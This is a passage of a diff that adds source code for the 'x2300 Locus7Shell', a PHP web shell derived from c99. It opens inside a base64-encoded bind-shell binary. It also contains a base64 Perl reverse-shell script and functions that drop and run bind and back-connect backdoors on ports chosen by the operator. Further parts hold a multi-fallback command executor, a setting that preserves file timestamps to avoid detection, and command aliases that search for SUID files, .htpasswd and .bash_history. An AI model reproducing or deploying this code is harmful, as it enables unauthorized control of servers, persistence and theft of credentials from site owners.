C5wbHQALmluaXQALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWUALmN0b3JzAC5kdG9ycwAuamNyAC5keW5hbWljAC5nb3QALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAuZGVidWdfYXJhbmdlcwAuZGVidWdfcHVibmFtZXMALmRlYnVnX2luZm8ALmRlYnVnX2FiYnJldgAuZGVidWdfbGluZQAuZGVidWdfc3RyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAEAAAACAAAAFIEECBQBAAATAAAAAAAAAAAAAAABAAAAAAAAACMAAAAHAAAAAgAAACiBBAgoAQAAIAAAAAAAAAAAAAAABAAAAAAAAAAxAAAABQAAAAIAAABIgQQISAEAAJgAAAAEAAAAAAAAAAQAAAAEAAAANwAAAAsAAAACAAAA4IEECOABAAAwAQAABQAAAAEAAAAEAAAAEAAAAD8AAAADAAAAAgAAABCDBAgQAwAAsAAAAAAAAAAAAAAAAQAAAAAAAABHAAAA////bwIAAADAgwQIwAMAACYAAAAEAAAAAAAAAAIAAAACAAAAVAAAAP7//28CAAAA6IMECOgDAAAgAAAABQAAAAEAAAAEAAAAAAAAAGMAAAAJAAAAAgAAAAiEBAgIBAAACAAAAAQAAAAAAAAABAAAAAgAAABsAAAACQAAAAIAAAAQhAQIEAQAAHgAAAAEAAAACwAAAAQAAAAIAAAAdQAAAAEAAAAGAAAAiIQECIgEAAAXAAAAAAAAAAAAAAABAAAAAAAAAHAAAAABAAAABgAAAKCEBAigBAAAAAEAAAAAAAAAAAAABAAAAAQAAAB7AAAAAQAAAAYAAACghQQIoAUAAIQDAAAAAAAAAAAAAAQAAAAAAAAAgQAAAAEAAAAGAAAAJIkECCQJAAAdAAAAAAAAAAAAAAABAAAAAAAAAIcAAAABAAAAAgAAAESJBAhECQAAYwAAAAAAAAAAAAAABAAAAAAAAACPAAAAAQAAAAIAAACoiQQIqAkAAAQAAAAAAAAAAAAAAAQAAAAAAAAAmQAAAAEAAAADAAAArJkECKwJAAAIAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAABAAAAAwAAALSZBAi0CQAACAAAAAAAAAAAAAAABAAAAAAAAACnAAAAAQAAAAMAAAC8mQQIvAkAAAQAAAAAAAAAAAAAAAQAAAAAAAAArAAAAAYAAAADAAAAwJkECMAJAADIAAAABQAAAAAAAAAEAAAACAAAALUAAAABAAAAAwAAAIiaBAiICgAABAAAAAAAAAAAAAAABAAAAAQAAAC6AAAAAQAAAAMAAACMmgQIjAoAAEgAAAAAAAAAAAAAAAQAAAAEAAAAwwAAAAEAAAADAAAA1JoECNQKAAAMAAAAAAAAAAAAAAAEAAAAAAAAAMkAAAAIAAAAAwAAAOCaBAjgCgAABAAAAAAAAAAAAAAABAAAAAAAAADOAAAAAQAAAAAAAAAAAAAA4AoAACYBAAAAAAAAAAAAAAEAAAAAAAAA1wAAAAEAAAAAAAAAAAAAAAgMAACIAAAAAAAAAAAAAAAIAAAAAAAAAOYAAAABAAAAAAAAAAAAAACQDAAAJQAAAAAAAAAAAAAAAQAAAAAAAAD2AAAAAQAAAAAAAAAAAAAAtQwAACsCAAAAAAAAAAAAAAEAAAAAAAAAAgEAAAEAAAAAAAAAAAAAAOAOAAB2AAAAAAAAAAAAAAABAAAAAAAAABABAAABAAAAAAAAAAAAAABWDwAAuwEAAAAAAAAAAAAAAQAAAAAAAAAcAQAAAQAAADAAAAAAAAAAEREAAL8AAAAAAAAAAAAAAAEAAAABAAAAEQAAAAMAAAAAAAAAAAAAANARAAAnAQAAAAAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAABIGAAA8AUAACEAAAA/AAAABAAAABAAAAAJAAAAAwAAAAAAAAAAAAAAOB4AALIDAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUgQQIAAAAAAMAAQAAAAAAKIEECAAAAAADAAIAAAAAAEiBBAgAAAAAAwADAAAAAADggQQIAAAAAAMABAAAAAAAEIMECAAAAAADAAUAAAAAAMCDBAgAAAAAAwAGAAAAAADogwQIAAAAAAMABwAAAAAACIQECAAAAAADAAgAAAAAABCEBAgAAAAAAwAJAAAAAACIhAQIAAAAAAMACgAAAAAAoIQECAAAAAADAAsAAAAAAKCFBAgAAAAAAwAMAAAAAAAkiQQIAAAAAAMADQAAAAAARIkECAAAAAADAA4AAAAAAKiJBAgAAAAAAwAPAAAAAACsmQQIAAAAAAMAEAAAAAAAtJkECAAAAAADABEAAAAAALyZBAgAAAAAAwASAAAAAADAmQQIAAAAAAMAEwAAAAAAiJoECAAAAAADABQAAAAAAIyaBAgAAAAAAwAVAAAAAADUmgQIAAAAAAMAFgAAAAAA4JoECAAAAAADABcAAAAAAAAAAAAAAAAAAwAYAAAAAAAAAAAAAAAAAAMAGQAAAAAAAAAAAAAAAAADABoAAAAAAAAAAAAAAAAAAwAbAAAAAAAAAAAAAAAAAAMAHAAAAAAAAAAAAAAAAAADAB0AAAAAAAAAAAAAAAAAAwAeAAAAAAAAAAAAAAAAAAMAHwAAAAAAAAAAAAAAAAADACAAAAAAAAAAAAAAAAAAAwAhAAEAAAAAAAAAAAAAAAQA8f8MAAAAAAAAAAAAAAAEAPH/KAAAAAAAAAAAAAAABADx/y8AAAAAAAAAAAAAAAQA8f86AAAAAAAAAAAAAAAEAPH/dAAAAMSFBAgAAAAAAgAMAIQAAAAAAAAAAAAAAAQA8f+PAAAArJkECAAAAAABABAAnQAAALSZBAgAAAAAAQARAKsAAAC8mQQIAAAAAAEAEgC4AAAA4JoECAEAAAABABcAxwAAANyaBAgAAAAAAQAWAM4AAADshQQIAAAAAAIADADkAAAAG4YECAAAAAACAAwAhAAAAAAAAAAAAAAABADx//AAAACwmQQIAAAAAAEAEAD9AAAAuJkECAAAAAABABEACgEAAKiJBAgAAAAAAQAPABgBAAC8mQQIAAAAAAEAEgAkAQAA+IgECAAAAAACAAwALwAAAAAAAAAAAAAABADx/zoBAAAAAAAAAAAAAAQA8f90AQAAAAAAAAAAAAAEAPH/eAEAAMCZBAgAAAAAAQITAIEBAACsmQQIAAAAAAAC8f+SAQAArJkECAAAAAAAAvH/pQEAAKyZBAgAAAAAAALx/7YBAACMmgQIAAAAAAECFQDMAQAArJkECAAAAAAAAvH/3wEAAAAAAAB1AQAAEgAAAPABAAAAAAAAcQAAABIAAAABAgAARIkECAQAAAARAA4ACAIAAAAAAADMAAAAEgAAABoCAAAAAAAAWgAAABIAAAAqAgAA2JoECAAAAAARAhYANwIAAK2IBAhKAAAAEgAMAEcCAAAAAAAAeAAAABIAAABZAgAAiIQECAAAAAASAAoAXwIAAAAAAAA5AAAAEgAAAHECAAAAAAAAOQAAABIAAACHAgAAoIUECAAAAAASAAwAjgIAAFyIBAhRAAAAEgAMAJ4CAADgmgQIAAAAABAA8f+qAgAAQIYECBwCAAASAAwArwIAAAAAAADmAAAAEgAAAMwCAAAAAAAAOgAAABIAAADcAgAA1JoECAAAAAAgABYA5wIAAAAAAAA5AAAAEgAAAPcCAAAkiQQIAAAAABIADQD9AgAAAAAAALkAAAASAAAADQMAAAAAAAArAAAAEgAAAB0DAADgmgQIAAAAABAA8f8kAwAA6IUECAAAAAASAgwAOwMAAOSaBAgAAAAAEADx/0ADAAAAAAAAeAAAABIAAABQAwAAAAAAAA4AAAASAAAAYQMAAEiJBAgEAAAAEQAOAHADAADUmgQIAAAAABAAFgB9AwAAAAAAADkAAAASAAAAjwMAAAAAAAAAAAAAIAAAAKMDAAAAAAAAAAAAACAAAAAAYWJpLW5vdGUuUwAuLi9zeXNkZXBzL2kzODYvZWxmL3N0YXJ0LlMAaW5pdC5jAGluaXRmaW5pLmMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2kzODYtbGliYy9jc3UvY3J0aS5TAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AY29tcGxldGVkLjQ0NjMAcC40NDYyAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFtZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AC9idWlsZC9idWlsZGQvZ2xpYmMtMi4zLjYvYnVpbGQtdHJlZS9pMzg2LWxpYmMvY3N1L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
+
+function checkproxyhost(){
+$host = getenv("HTTP_HOST");
+$filename = '/tmp/.setan/xh';
+if (file_exists($filename)) {
+$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
+} else {
+$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>";
+ } 
+}
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
+{ 
+ $ip = gethostbyname($_SERVER["HTTP_HOST"]);
+ $por = $_POST['backconnectport'];
+ if(is_writable(".")){
+ cfb("shbd",$backdoor);
+ ex("chmod 777 shbd");
+ $cmd = "./shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+ }else{
+ cfb("/tmp/shbd",$backdoor);
+ ex("chmod 777 /tmp/shbd");
+ $cmd = "./tmp/shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
+{
+ if(is_writable(".")){
+ cf("back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("back")) { unlink("back"); }
+ }else{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
+{
+ if(is_writable(".")){
+ cf("backc",$back_connect_c);
+ ex("chmod 777 backc");
+ //$blah = ex("gcc back.c -o backc");
+ $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("backc")) { unlink("backc"); }
+ }else{
+ ex("chmod 777 /tmp/backc");
+ cf("/tmp/backc",$back_connect_c);
+ //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
+}
+
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function cfb($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or bberr();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function err()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>";
+}
+
+function bberr()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
+}
+
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+//EoW
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+//Start Enumerate function
+//function ENUMERATE()
+
+$hostname_x=php_uname(n);
+$itshome = getcwd();
+$itshome = str_replace("/home/","~",$itshome);
+$itshome = str_replace("/public_html","/x2300.php",$itshome);
+$enumerate = "http://".$hostname_x."/".$itshome."";
+
+//End Enumerate function
+
+//Starting calls 
+ini_set("max_execution_time",0); 
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} 
+error_reporting(5); 
+$adires="";
+@ignore_user_abort(TRUE); 
+@set_magic_quotes_runtime(0); 
+$win = strtolower(substr(PHP_OS,0,3)) == "win"; 
+define("starttime",getmicrotime()); 
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} 
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); 
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} 
+
+$shver = "1.0a beta"; //Current version 
+//CONFIGURATION AND SETTINGS 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} 
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} 
+else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL 
+} 
+
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. 
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} 
+if (empty($surl)) 
+{ 
+ $surl = "?".$includestr; //Self url 
+} 
+$surl = htmlspecialchars($surl); 
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. 
+
+//Authentication 
+$login = ""; //login 
+//DON'T FORGOT ABOUT PASSWORD!!! 
+$pass = ""; //password 
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass) 
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") 
+$login_txt = "Restricted area"; //http-auth message. 
+$accessdeniedmess = "<a href=\"http://locus7s.com\">x2300 Locus7Shell v.".$shver."</a>: access denied"; 
+
+$gzipencode = TRUE; //Encode with gzip? 
+
+$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) 
+
+$c99sh_updateurl = "http://locus7s.com/files/lshell_update/"; //Update server 
+$c99sh_sourcesurl = "http://locus7s.com/"; //Sources-server 
+
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time 
+
+$donated_html = "<center><b>x2300 Locus7Shell Modified by #!physx^ </b></center>"; 
+/* If you publish free shell and you wish 
+add link to your site or any other information, 
+put here your html. */ 
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. 
+
+$curdir = "./"; //start folder 
+//$curdir = getenv("DOCUMENT_ROOT"); 
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) 
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) 
+
+$log_email = "user@host.tld"; //Default e-mail for sending logs 
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending 
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies. 
+
+// Registered file-types. 
+//  array( 
+//   "{action1}"=>array("ext1","ext2","ext3",...), 
+//   "{action2}"=>array("ext4","ext5","ext6",...), 
+//   ... 
+//  ) 
+$ftypes  = array( 
+ "html"=>array("html","htm","shtml"), 
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), 
+ "exe"=>array("sh","install","bat","cmd"), 
+ "ini"=>array("ini","inf"), 
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), 
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), 
+ "sdb"=>array("sdb"), 
+ "phpsess"=>array("sess"), 
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") 
+); 
+
+// Registered executable file-types. 
+//  array( 
+//   string "command{i}"=>array("ext1","ext2","ext3",...), 
+//   ... 
+//  ) 
+//   {command}: %f% = filename 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} 
+$dizin = str_replace("\\\\","\\",$dizin); 
+$dizinispd = htmlspecialchars($dizin); 
+/*dizin*/ 
+$real = realpath($dizinispd); 
+$path = basename ($PHP_SELF); 
+function dosyayicek($link,$file) 
+{ 
+   $fp = @fopen($link,"r"); 
+   while(!feof($fp)) 
+   { 
+       $cont.= fread($fp,1024); 
+   } 
+   fclose($fp); 
+
+   $fp2 = @fopen($file,"w"); 
+   fwrite($fp2,$cont); 
+   fclose($fp2); 
+} 
+
+
+
+
+$exeftypes  = array( 
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"), 
+ "perl %f%" => array("pl","cgi") 
+); 
+
+/* Highlighted files. 
+  array( 
+   i=>array({regexp},{type},{opentag},{closetag},{break}) 
+   ... 
+  ) 
+  string {regexp} - regular exp. 
+  int {type}: 
+0 - files and folders (as default), 
+1 - files only, 2 - folders only 
+  string {opentag} - open html-tag, e.g. "<b>" (default) 
+  string {closetag} - close html-tag, e.g. "</b>" (default) 
+  bool {break} - if TRUE and found match then break 
+*/ 
+$regxp_highlight  = array( 
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example 
+  array("config.php",1) // example 
+); 
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. 
+ // array (i=>{letter} ...); string {letter} - letter of a drive 
+//$safemode_diskettes = range("a","z"); 
+$hexdump_lines = 8;// lines in hex preview file 
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line 
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd 
+
+$bindport_pass = "c99";  // default password for binding 
+$bindport_port = "31373"; // default port for binding 
+$bc_port = "31373"; // default port for back-connect 
+$datapipe_localport = "8081"; // default port for datapipe 
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj 
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR 
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT 
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI 
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi 
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl 
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
+
+// Command-aliases 
+if (!$win) 
+{ 
+ $cmdaliases = array( 
+  array("-----------------------------------------------------------", "ls -la"), 
+  array("find all suid files", "find / -type f -perm -04000 -ls"), 
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"), 
+  array("find all sgid files", "find / -type f -perm -02000 -ls"), 
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), 
+  array("find config.inc.php files", "find / -type f -name config.inc.php"), 
+  array("find config* files", "find / -type f -name \"config*\""), 
+  array("find config* files in current dir", "find . -type f -name \"config*\""), 
+  array("find all writable folders and files", "find / -perm -2 -ls"), 
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"), 
+  array("find all service.pwd files", "find / -type f -name service.pwd"), 
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"), 
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"), 
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), 
+  array("find all .bash_history files", "find / -type f -name .bash_history"), 
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"), 
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), 
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), 
+  array("list file attributes on a Linux second extended file system", "lsattr -va"), 
+  array("show opened ports", "netstat -an | grep -i listen") 
+ ); 
+} 
+else 
+{ 
+ $cmdaliases = array( 
+  array("-----------------------------------------------------------", "dir"), 
+  array("show opened ports", "netstat -an") 
+ ); 
+} 
+
+$sess_cookie = "c99shvars"; // Cookie-variable name 
+
+$usefsbuff = TRUE; //Buffer-function 
+$copy_unset = FALSE; //Remove copied files from buffer after pasting 
+
+//Quick launch 
+$quicklaunch = array( 
+ array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), 
+ array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), 
+ array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), 
+ array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), 
+ array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), 
+ array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), 
+ array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), 
+ array("<br><center><b>[Enumerate]</b>",$enumerate),
+ array("<b>[Encoder]</b>",$surl."act=encoder&d=%d"), 
+ array("<b>[Tools]</b>",$surl."act=tools&d=%d"), 
+ array("<b>[Proc.]</b>",$surl."act=processes&d=%d"), 
+ array("<b>[FTP Brute]</b>",$surl."act=ftpquickbrute&d=%d"), 
+ array("<b>[Sec.]</b>",$surl."act=security&d=%d"), 
+ array("<b>[SQL]</b>",$surl."act=sql&d=%d"), 
+ array("<b>[PHP-Code]</b>",$surl."act=eval&d=%d"), 
+ array("<b>[Backdoor Host]</b>",$surl."act=shbd"),
+ array("<b>[Back-Connection]</b>",$surl."act=backc"), 
+ array("<b>[milw0rm it!]</b>",$millink),
+ array("<b>[PHP-Proxy]</b>",$phprox),
+ array("<b>[Self remove]</b></center>",$surl."act=selfremove")
+); 
+
+//Highlight-code colors 
+$highlight_background = "#c0c0c0"; 
+$highlight_bg = "#FFFFFF"; 
+$highlight_comment = "#6A6A6A"; 
+$highlight_default = "#0000BB"; 
+$highlight_html = "#1300FF"; 
+$highlight_keyword = "#007700"; 
+$highlight_string = "#000000"; 
+
+@$f = $_REQUEST["f"]; 
+@extract($_REQUEST["c99shcook"]); 
+
+//END CONFIGURATION 
+
+
+// \/Next code isn't for editing\/ 
+/*function ex($cfe) 
+{ 
+ $res = ''; 
+ if (!empty($cfe)) 
+ { 
+  if(function_exists('exec')) 
+   { 
+    @exec($cfe,$res); 
+    $res = join("\n",$res); 
+   } 
+  elseif(function_exists('shell_exec')) 
+   { 
+    $res = @shell_exec($cfe); 
+   } 
+  elseif(function_exists('system')) 
+   { 
+    @ob_start(); 
+    @system($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(function_exists('passthru')) 
+   { 
+    @ob_start(); 
+    @passthru($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(@is_resource($f = @popen($cfe,"r"))) 
+  { 
+   $res = ""; 
+   while(!@feof($f)) { $res .= @fread($f,1024); } 
+   @pclose($f); 
+  } 
+ } 
+ return $res; 
+}*/
+/*function which($pr) 
+{ 
+$path = ex("which $pr"); 
+if(!empty($path)) { return $path; } else { return $pr; } 
+} 
+
+function cf($fname,$text) 
+{ 
+ $w_file=@fopen($fname,"w") or err(0); 
+ if($w_file) 
+ { 
+ @fputs($w_file,@base64_decode($text)); 
+ @fclose($w_file); 
+ } 
+}*/ 
+/*function err($n,$txt='') 
+{ 
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=Verdana size=-2><div align=center><b>';     
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; 
+if(!empty($txt)) { echo " $txt"; } 
+echo '</b></div></font></td></tr></table>'; 
+return null; 
+}*/
+@set_time_limit(0); 
+$tmp = array(); 
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} 
+$s = "!^(".implode("|",$tmp).")$!i"; 
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://locus7s.com/\">x2300 Shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} 
+if (!empty($login)) 
+{ 
+ if (empty($md5_pass)) {$md5_pass = md5($pass);} 
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) 
+ { 
